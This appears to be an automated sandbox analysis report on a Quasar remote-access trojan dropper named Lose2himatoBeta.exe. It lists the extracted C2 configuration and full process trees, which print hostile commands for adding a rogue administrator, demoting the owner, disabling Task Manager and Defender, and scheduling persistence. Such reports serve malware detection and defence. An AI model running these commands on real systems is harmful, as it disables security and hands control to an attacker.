Analysis
-
max time kernel
46s -
max time network
52s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 13:43
Behavioral task
behavioral1
Sample
Lose2himatoBeta.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Lose2himatoBeta.exe
Resource
win10v2004-20241007-en
General
-
Target
Lose2himatoBeta.exe
-
Size
135.3MB
-
MD5
15498caff53ec11af87a73319367838c
-
SHA1
4a45433a0a513119418ed44f4c475151a43ba923
-
SHA256
f962beec9703a522fae680c30ec2b7bc44565e431128bc46d1410e476b564962
-
SHA512
aaa86e7258f11329cf9853d4dec64e7b891dc139fc8dd1133e2229b0987494ad4191d9663cc3cf5c90a4a99e8ccca86171d8b3c12f09885ca751e4bdd2fc2430
-
SSDEEP
786432:zl5HNB9pAbrDMZBfPPgs9TFMd15DeSqVO0EQWW2IxEm+KoZd7APUF85n9wwTtLwd:J5HOsPfmZ0/EmREdEPUF85nSUgTX
Malware Config
Extracted
quasar
1.4.1
Office04
himato667-58401.portmap.host:58401
0e2bc079-3316-407c-a26f-115195d9fe5b
-
encryption_key
D14CC6B8490A41A48C1E115285B6932B9A857EA0
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/files/0x000900000001daee-38.dat family_quasar behavioral2/memory/3420-59-0x0000000000580000-0x00000000008A4000-memory.dmp family_quasar -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Lose2himatoBeta.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation Lose2himatoBeta.exe -
Executes dropped EXE 2 IoCs
Processes:
better.exeClient.exepid Process 3420 better.exe 4048 Client.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Drops file in System32 directory 2 IoCs
Processes:
better.exedescription ioc Process File created C:\Windows\system32\SubDir\Client.exe better.exe File opened for modification C:\Windows\system32\SubDir\Client.exe better.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
Lose2himatoBeta.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp" Lose2himatoBeta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exenet.execmd.exereg.execmd.exenet1.execmd.exeshutdown.exeLose2himatoBeta.exenet.execmd.exenet1.exereg.exenet1.exereg.exenet.execmd.exenet.exenet1.execmd.execmd.exereg.execmd.execmd.execmd.execmd.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lose2himatoBeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2878641211-696417878-3864914810-1000\{48BE38F7-2AF9-426E-8B16-483FD1B4AFE7} msedge.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 4540 schtasks.exe 384 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
msedge.exemsedge.exemsedge.exemsedge.exeidentity_helper.exepid Process 2248 msedge.exe 2248 msedge.exe 4852 msedge.exe 4852 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 4464 msedge.exe 4464 msedge.exe 5952 identity_helper.exe 5952 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
msedge.exepid Process 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
better.exeClient.exeshutdown.exedescription pid Process Token: SeDebugPrivilege 3420 better.exe Token: SeDebugPrivilege 4048 Client.exe Token: SeShutdownPrivilege 3444 shutdown.exe Token: SeRemoteShutdownPrivilege 3444 shutdown.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
Processes:
msedge.exeClient.exepid Process 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 4048 Client.exe 4048 Client.exe 1564 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
msedge.exeClient.exepid Process 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 1564 msedge.exe 4048 Client.exe 4048 Client.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid Process 4048 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Lose2himatoBeta.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 2320 wrote to memory of 4204 2320 Lose2himatoBeta.exe 84 PID 2320 wrote to memory of 4204 2320 Lose2himatoBeta.exe 84 PID 2320 wrote to memory of 4204 2320 Lose2himatoBeta.exe 84 PID 2320 wrote to memory of 3572 2320 Lose2himatoBeta.exe 86 PID 2320 wrote to memory of 3572 2320 Lose2himatoBeta.exe 86 PID 2320 wrote to memory of 3572 2320 Lose2himatoBeta.exe 86 PID 2320 wrote to memory of 2980 2320 Lose2himatoBeta.exe 88 PID 2320 wrote to memory of 2980 2320 Lose2himatoBeta.exe 88 PID 2320 wrote to memory of 2980 2320 Lose2himatoBeta.exe 88 PID 4204 wrote to memory of 4516 4204 cmd.exe 90 PID 4204 wrote to memory of 4516 4204 cmd.exe 90 PID 4204 wrote to memory of 4516 4204 cmd.exe 90 PID 4516 wrote to memory of 1680 4516 net.exe 91 PID 4516 wrote to memory of 1680 4516 net.exe 91 PID 4516 wrote to memory of 1680 4516 net.exe 91 PID 2320 wrote to memory of 3180 2320 Lose2himatoBeta.exe 92 PID 2320 wrote to memory of 3180 2320 Lose2himatoBeta.exe 92 PID 2320 wrote to memory of 3180 2320 Lose2himatoBeta.exe 92 PID 2320 wrote to memory of 5052 2320 Lose2himatoBeta.exe 94 PID 2320 wrote to memory of 5052 2320 Lose2himatoBeta.exe 94 PID 2320 wrote to memory of 5052 2320 Lose2himatoBeta.exe 94 PID 3572 wrote to memory of 3136 3572 cmd.exe 96 PID 3572 wrote to memory of 3136 3572 cmd.exe 96 PID 3572 wrote to memory of 3136 3572 cmd.exe 96 PID 3136 wrote to memory of 3372 3136 net.exe 97 PID 3136 wrote to memory of 3372 3136 net.exe 97 PID 3136 wrote to memory of 3372 3136 net.exe 97 PID 2320 wrote to memory of 868 2320 Lose2himatoBeta.exe 98 PID 2320 wrote to memory of 868 2320 Lose2himatoBeta.exe 98 PID 2320 wrote to memory of 868 2320 Lose2himatoBeta.exe 98 PID 3180 wrote to memory of 4560 3180 cmd.exe 100 PID 3180 wrote to memory of 4560 3180 cmd.exe 100 PID 3180 wrote to memory of 4560 3180 cmd.exe 100 PID 4560 wrote to memory of 3060 4560 net.exe 101 PID 4560 wrote to memory of 3060 4560 net.exe 101 PID 4560 wrote to memory of 3060 4560 net.exe 101 PID 2320 wrote to memory of 4836 2320 Lose2himatoBeta.exe 102 PID 2320 wrote to memory of 4836 2320 Lose2himatoBeta.exe 102 PID 2320 wrote to memory of 4836 2320 Lose2himatoBeta.exe 102 PID 5052 wrote to memory of 2732 5052 cmd.exe 104 PID 5052 wrote to memory of 2732 5052 cmd.exe 104 PID 5052 wrote to memory of 2732 5052 cmd.exe 104 PID 2980 wrote to memory of 2728 2980 cmd.exe 105 PID 2980 wrote to memory of 2728 2980 cmd.exe 105 PID 2980 wrote to memory of 2728 2980 cmd.exe 105 PID 2728 wrote to memory of 1864 2728 net.exe 106 PID 2728 wrote to memory of 1864 2728 net.exe 106 PID 2728 wrote to memory of 1864 2728 net.exe 106 PID 2320 wrote to memory of 3004 2320 Lose2himatoBeta.exe 107 PID 2320 wrote to memory of 3004 2320 Lose2himatoBeta.exe 107 PID 2320 wrote to memory of 3004 2320 Lose2himatoBeta.exe 107 PID 868 wrote to memory of 1204 868 cmd.exe 109 PID 868 wrote to memory of 1204 868 cmd.exe 109 PID 868 wrote to memory of 1204 868 cmd.exe 109 PID 4836 wrote to memory of 2892 4836 cmd.exe 110 PID 4836 wrote to memory of 2892 4836 cmd.exe 110 PID 4836 wrote to memory of 2892 4836 cmd.exe 110 PID 2320 wrote to memory of 64 2320 Lose2himatoBeta.exe 111 PID 2320 wrote to memory of 64 2320 Lose2himatoBeta.exe 111 PID 2320 wrote to memory of 64 2320 Lose2himatoBeta.exe 111 PID 64 wrote to memory of 2300 64 cmd.exe 113 PID 64 wrote to memory of 2300 64 cmd.exe 113 PID 64 wrote to memory of 2300 64 cmd.exe 113 PID 3004 wrote to memory of 456 3004 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lose2himatoBeta.exe"C:\Users\Admin\AppData\Local\Temp\Lose2himatoBeta.exe"1⤵
- Checks computer location settings
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\net.exenet user OWN3DbyHXM4TO /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user OWN3DbyHXM4TO /add4⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\net.exenet user OWN3DbyHXM4TO Test3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user OWN3DbyHXM4TO Test4⤵
- System Location Discovery: System Language Discovery
PID:3372
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\net.exenet localgroup Administrators "OWN3DbyHXM4TO" /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add4⤵
- System Location Discovery: System Language Discovery
PID:1864
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete2⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Admin" /delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Admin" /delete4⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f3⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f3⤵
- System Location Discovery: System Language Discovery
PID:2300
-
-
-
C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3420 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4540
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4048 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:384
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to2⤵
- System Location Discovery: System Language Discovery
PID:1308 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to3⤵PID:2924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe1e0446f8,0x7ffe1e044708,0x7ffe1e0447184⤵PID:3320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,11949396490243485272,17735142568035267828,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:24⤵PID:3444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,11949396490243485272,17735142568035267828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2464 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4852
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD2⤵
- System Location Discovery: System Language Discovery
PID:4912 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1564 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe1e0446f8,0x7ffe1e044708,0x7ffe1e0447184⤵PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:24⤵PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:84⤵PID:4240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:14⤵PID:4552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:14⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:14⤵PID:3220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:14⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:14⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5804 /prefetch:84⤵PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5744 /prefetch:84⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:14⤵PID:1680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:14⤵PID:5536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6568 /prefetch:84⤵PID:5768
-
-
